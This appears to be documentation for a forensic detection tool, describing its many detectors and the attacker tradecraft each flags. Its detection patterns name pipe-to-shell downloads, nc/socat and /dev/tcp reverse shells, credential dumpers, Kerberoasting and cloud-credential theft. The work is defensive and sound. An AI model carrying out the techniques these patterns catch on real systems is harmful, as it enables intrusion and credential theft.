Detectors 59 detectors over a collected case, layered from behavioral heuristics to live intel matching, with auto-Sigma export per detector.

How they fit together

A detector implements detect(store) -> Iterable[Finding]. It reads artifacts from the store via store.iter_artifacts(collector=..., category=...), applies its logic, and yields findings. Detectors don't talk to each other directly — they share the evidence store. Order is incidental, except timeline which runs last and depends on others.

Each finding has a severity (info low med high crit), a MITRE ATT&CK technique ID where applicable, a free-form evidence dict, and references to the underlying artifact UUIDs.

The roster

suspicious_processes

Heuristics over the live process tree:

• Shell spawned by browser (Chrome/Firefox/Edge/Brave → sh/bash/powershell)
• Interpreters running from drop locations (/tmp, %TEMP%, /Users/Public, …)
• Process with no exe path (potential unlinked / memfd execution)
• PowerShell -EncodedCommand with long base64 payload
• curl|bash and iwr|iex pipe-to-shell patterns

network_anomaly

Listening sockets outside a benign-port allow-list; established external connections (with the owning process linked back from the process collector).

persistence_outlier

Generic cross-platform: every artifact in category persistence is scanned for references to writable/world-shared paths (/tmp/, /Users/Public/, \AppData\Local\Temp\, /dev/shm/, …) and for binaries in user-writable scratch space.

lolbins

Living-off-the-land tradecraft. Pattern set covers LOLBAS (certutil, bitsadmin, mshta, regsvr32, rundll32 with URL, msbuild, installutil), GTFOBins (osascript shell escape, xattr quarantine removal, curl/wget fetching executable content, nc/socat reverse shells, python socket.socket one-liners, bash /dev/tcp/).

yara

If yara-python is installed, compiles every .yar/.yara file under digger/rules/yara/ and any directory you pass via the detector's extra_dirs argument. Scans:

• The executables of running processes
• Files in the recent_files collector's drop-location walk

Bundled rules cover mimikatz strings, Cobalt Strike default beacon strings, PowerView/PowerSploit, reverse-shell one-liners, credential-harvest keywords, and Shai-Hulud markers.

ioc

Plain-text IOC feeds from digger/rules/iocs/*.txt. Indicator type auto-detected by format: SHA-256 (64 hex), MD5 (32 hex), IPv4, URL, domain, path. Process exe SHA-256s are matched against the hash list; every artifact's serialized data is searched for IP/domain matches.

shai_hulud

Targeted detector for the Shai-Hulud npm worm:

• Compromised name@version matches against bundled list and live shai_hulud_packages feed
• Workflow file matching shai-hulud-workflow.yml in any local repo
• Worm marker strings (trufflehog, shai-hulud-workflow, GITHUB_TOKEN, …) in any workflow file body
• webhook.site/<uuid> URLs in workflows or live process command lines

supply_chain

Two layers:

• Malicious-package match — npm/PyPI/gem package@version pairs from the bundled list + live OpenSSF malicious-packages feed.
• CISA KEV cross-check — installed-software inventory matched against CISA Known Exploited Vulnerabilities entries (live feed with bundled snapshot fallback).

c2

C2-framework signatures from digger/rules/c2/c2_signatures.yaml: Cobalt Strike, Sliver, Mythic, Brute Ratel, Havoc, Empire, Metasploit Meterpreter, Pupy, Posh-C2, AsyncRAT family. Matches against browser history URLs and process command lines.

Also fuses live intel:

• Established connection IPs vs. ThreatFox
• Process exe SHA-256s vs. MalwareBazaar
• URLs vs. URLhaus

threat_actor

Named-actor TTP patterns from digger/rules/threat_actors/ttp_signatures.yaml: APT29/Midnight Blizzard, APT28, FIN7, Lazarus, Volt Typhoon, Scattered Spider/Octo Tempest, Black Basta/BlackCat/Akira ransomware affiliates. Attribution is heuristic — multiple actors share TTPs, so digger reports the match without making a definitive call.

browser

Flags Chrome/Edge/Brave/Firefox extensions with sweeping permissions: <all_urls>, webRequest, cookies, history, clipboardRead/Write, nativeMessaging, debugger, management, proxy.

env_hijack

Environment variables that override the dynamic linker (LD_PRELOAD, LD_AUDIT, DYLD_INSERT_LIBRARIES), shell init hooks (PROMPT_COMMAND, BASH_ENV, ENV), or PATH entries pointing at writable temp dirs.

ssh_auth_keys

authorized_keys with forced-command directives, unusually long key lists, unrestricted keys.

service_cve

Pulls service versions captured by service_versions collector and matches them against the live NVD CPE-keyed CVE corpus (nvd_service_cves feed, 24h refresh). Range-aware: handles introduced / fixed / last_affected OSV-style ranges with loose semver. No bundled fallback — runs only when the live cache is populated. Tag: T1190.

firewall_audit

See Firewall audit + remediation. Eight checks across pf / nftables / iptables / ufw / firewalld / WFP + macOS Application Firewall, with platform-specific copy-pasteable fix commands routed through redact_dangerous_command.

Counter-offensive detectors

Nine detectors target Decepticon-style red-team tradecraft, all observation-only. See Decepticon countermeasures for the full phase-by-phase rundown.

• recon — portscan footprints, SSH brute-force / banner-grab / user-enumeration (T1595.001, T1110.001, T1592.002, T1589.002)
• exploitation — service-spawns-shell, three-tier RCE chains, 11 shellcode-shape cmdline patterns, web-server log exploit signatures including Log4Shell / Spring4Shell / inline PHP / Shellshock (T1190 / T1059 / T1203)
• privesc — world-writable setuid, setuid in scratch / home, GTFOBins-trivial setuid (perl/python/awk/bash/cp/mv), sudoers NOPASSWD: ALL, dangerous Linux file capabilities, kernel taint bits decoded (T1548 / T1068 / T1547.006)
• lateral — SMB/SSH/WinRM/RDP/VNC outbound to RFC1918, credential dumpers (mimikatz / Rubeus / SafetyKatz / secretsdump / LaZagne / Certipy), Impacket / evil-winrm / CrackMapExec / Responder by name, SSH ProxyJump, pass-the-hash markers in Windows 4624 (T1021 / T1550 / T1570)
• ad_attacks — Kerberoasting (4769 RC4-HMAC), AS-REP roast (4768 PreAuthType 0), BloodHound family, DCSync via cmdline or 4662 replication-rights GUID, AdminSDHolder modification (5136) (T1558.003 / T1558.004 / T1003.006 / T1484.001)
• cloud_attacks — IMDS endpoint (169.254.169.254) hit from non-cloud-agent processes, cloud creds in shell env, world-readable credentials files, container escape primitives, kubeconfig theft, cloud-CLI privesc commands (T1552.005 / T1078.004 / T1611)
• counter_re — gdb / lldb / dtrace / x64dbg / IDA / Ghidra / radare2 / frida / WindBg with target-PID matching digger or an EDR / audit process; self-attribution via digger.opsec.self_id (T1622 / T1057)
• persistent_sessions — tmux/screen/zellij parented by network services, detached nohup/setsid with sockets, user-systemd ExecStart in user-writable shell scripts (T1546 / T1543.002)
• attacker_tooling — 60+ red-team tools across 10 categories; running OR installed; self-attribution for dev-clone / venv paths (T1588.002)

memory_anomaly (extended)

RWX regions, anonymous-exec regions, drop-loaded modules — same as before, but severity now escalates to critical when the affected process's parent is a listening network service (the canonical post-RCE landing signature). Cross-correlates with the exploitation detector's parent-name set.

browser (extended)

See Browser scanner for the full list of branches. Beyond the original risky-extension check, the detector now covers cookies (counts + bad-host), saved-passwords summary, IndexedDB / Local Storage / PWAs / profile defaults, service workers with URLhaus + ThreatFox cross-reference, and a corpus-driven detection for unpatched Chromium bugs.

sigma

Optional. Run via digger sigma --case-dir <case>. Loads Sigma YAML rules from the bundled corpus AND the live SigmaHQ rule cache (sigmahq_corpus feed), matches them against process_creation and network_connection log sources. See Sigma rules.

Specialized auditors

Detectors that pair with a dedicated collector / ingester and run only after that collector has populated the case:

• idp_security — see IdP audit-log observability. Ingests Okta / Entra / Workspace audit logs and detects MFA fatigue, OAuth phishing, admin / federation tampering, impossible travel, password spray (I1–I6, T1110.003 / T1621 / T1098.001 / T1078.004 / T1556.007).
• slsa_audit — see SLSA provenance audit. Walks node_modules + site-packages, parses any local in-toto / SLSA / sigstore-bundle attestations, flags missing / unparseable / untrusted-builder / source-mismatched provenance (S1–S5, T1195.002).
• k8s_security — Kubernetes cluster-side forensics. Privileged pods, dangerous hostPath, hostNetwork / PID / IPC, ClusterRoleBinding to system:authenticated, SA → cluster-admin, untrusted-registry images, secret-baked-in-env, default SA, namespace missing NetworkPolicy (K1–K10, T1611 / T1098 / T1525 / T1078.001).
• android_security — see Android forensics (adb). Sideloaded installs, AccessibilityService abuse, device-admin grants, swiss-army-knife permission combos, stale security patches (A1–A6, T1417 / T1626 / T1430 / T1404).
• mcp_audit — see MCP config audit. Project-scoped autoinstall, raw-script exec, credential env vars, network transport, untrusted npm scope (P1–P5, T1195.002 / T1059 / T1552.001 / T1071.001).
• ci_workflow_audit — see CI/CD workflow audit. Pwn-request, workflow_run from forks, untrusted-input interpolations, unpinned third-party actions, persist-credentials, write-all permissions, self-modifying workflows (W1–W7, T1199 / T1195.002 / T1059 / T1552.001 / T1078.004).
• git_hook_audit — see Git hook audit. Pipe-to-shell, network-fetch in silent-operation hooks, eval-input injection, self-modifying hooks, encoded payloads, plus silent-op-hook surface-area awareness (G1–G7, T1546 / T1059 / T1027 / T1505.003).
• macos_tcc — see macOS TCC consent audit. Non-Apple grants for FullDiskAccess / Accessibility / PostEvent / ScreenCapture / Camera / Mic / AppleEvents, grants to binaries in suspicious paths, user-DB-only grants that bypass the system DB (T1–T5, T1543.001 / T1056.001 / T1113 / T1125 / T1123 / T1559.001).
• macos_launchd — see macOS launchd deep audit. Network-fetch in ProgramArguments, encoded payloads, Label/filename masquerade, WatchPaths on writable dirs, interpreter+KeepAlive respawn loops, osascript runners (L1–L7, T1543.001 / T1059.004 / T1059.002 / T1027 / T1036 / T1546).
• vscode_audit — see VS Code audit. Sideloaded extensions, untrusted publishers, workspace-trust disablement, http.proxyStrictSSL=false, terminal-shell hijacks, project-scoped .vscode/settings.json with risky keys (V1–V7, T1195.002 / T1546 / T1059 / T1557 / T1505.003).
• browser_ext_perms — see Browser extension permission combinations. nativeMessaging, webRequest+all_urls, all_urls+cookies+tabs (session theft), proxy / debugger, generic spy stack, hardware bridges, declarativeNetRequest with many host patterns (B1–B8, T1176 / T1071.001 / T1539 / T1557 / T1090 / T1056.001 / T1543).

Persistence (cross-platform)

Deep-audit detectors that complete the cross-platform persistence story (macOS launchd + TCC, Linux systemd / cron / shell rc, Windows registry). Each runs on the existing platform collector's artifacts; no new CLI commands required.

• systemd_audit — see Linux systemd unit audit. User AND system unit text inspected: network-fetch in Exec*, encoded payloads, interpreter + Restart respawn, ExecStart from writable path + auto-enabled, root + writable Exec target, writable EnvironmentFile / LoadCredential, sub-minute timers (U1–U7, T1543.002 / T1059.004 / T1053.006 / T1027 / T1546).
• cron_audit — see Cron / anacron / at deep audit. /etc/crontab + /etc/cron.* + /var/spool/cron* + /var/spool/at: network-fetch, encoded payloads, command in writable path, root-context with attacker path, @reboot, at-jobs, high-frequency cadence (C1–C7, T1053.003 / T1053.001 / T1059.004 / T1027 / T1546 / T1037).
• shell_profile_audit — see Shell rc / profile audit. Bash / zsh / fish / nushell init files under HOME + /etc: network-fetch, encoded payloads, PATH prepend with writable head, alias hijack of sudo / ssh / git / docker, trap / PROMPT_COMMAND / precmd, source from writable, LD_PRELOAD / DYLD_INSERT_LIBRARIES export (SH1–SH7, T1546.004 / T1059.004 / T1027 / T1574.007 / T1574.006).
• windows_registry_audit — see Windows registry persistence audit. Run / RunOnce values with writable path, LOLBin proxy executors, encoded PowerShell, network-fetch; Winlogon Shell / Userinit hijack; SilentProcessExit MonitorProcess (R1–R6, T1547.001 / T1547.004 / T1546.012 / T1218 / T1059.001 / T1027).

timeline

Synthesizes a chronological event timeline from process create times, recent-file mtimes, and macOS quarantine timestamps. Emits one informational finding containing up to 2000 sorted events for report rendering.

Running a subset

digger scan --case-dir x --only suspicious_processes,c2,shai_hulud

Severity ladders

The AI triage step re-grades severity independently using the IC estimative-probability ladder.